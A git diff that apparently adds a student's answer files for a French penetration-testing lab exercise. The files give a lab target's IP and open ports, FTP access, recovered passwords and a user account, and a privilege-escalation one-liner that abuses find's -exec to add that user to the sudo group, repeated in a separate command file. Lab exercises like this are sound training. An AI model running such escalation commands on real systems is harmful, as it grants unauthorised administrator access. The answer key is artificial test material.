diff --git a/Felicitation.txt b/Felicitation.txt new file mode 100644 index 0000000..bd5144f --- /dev/null +++ b/Felicitation.txt @@ -0,0 +1,3 @@ +Bravo à tous pour avoir terminé le TP ! + +Continuez comme ça ! \ No newline at end of file diff --git a/answers.txt b/answers.txt new file mode 100644 index 0000000..8a86fbf --- /dev/null +++ b/answers.txt @@ -0,0 +1,26 @@ +1. + +ip: 192.168.56.55 +port: 22 et 21 + +2. + +connexion ftp + +3. + +mdp: yzhxvq +cle: IJDK + +devien: python + +user: deby +mdp: python + +4. + +./find . -exec /usr/sbin/usermod -aG sudo deby \; -quit + +5. + +reussi !!! \ No newline at end of file diff --git a/np/commandeBash.txt b/np/commandeBash.txt new file mode 100644 index 0000000..13452c4 --- /dev/null +++ b/np/commandeBash.txt @@ -0,0 +1 @@ +./find . -exec /usr/sbin/usermod -aG sudo deby \; -quit \ No newline at end of file diff --git a/np/commandeFTP.txt b/np/commandeFTP.txt new file mode 100644 index 0000000..5fb5806 --- /dev/null +++ b/np/commandeFTP.txt @@ -0,0 +1 @@ +ftp 192.168.56.55 \ No newline at end of file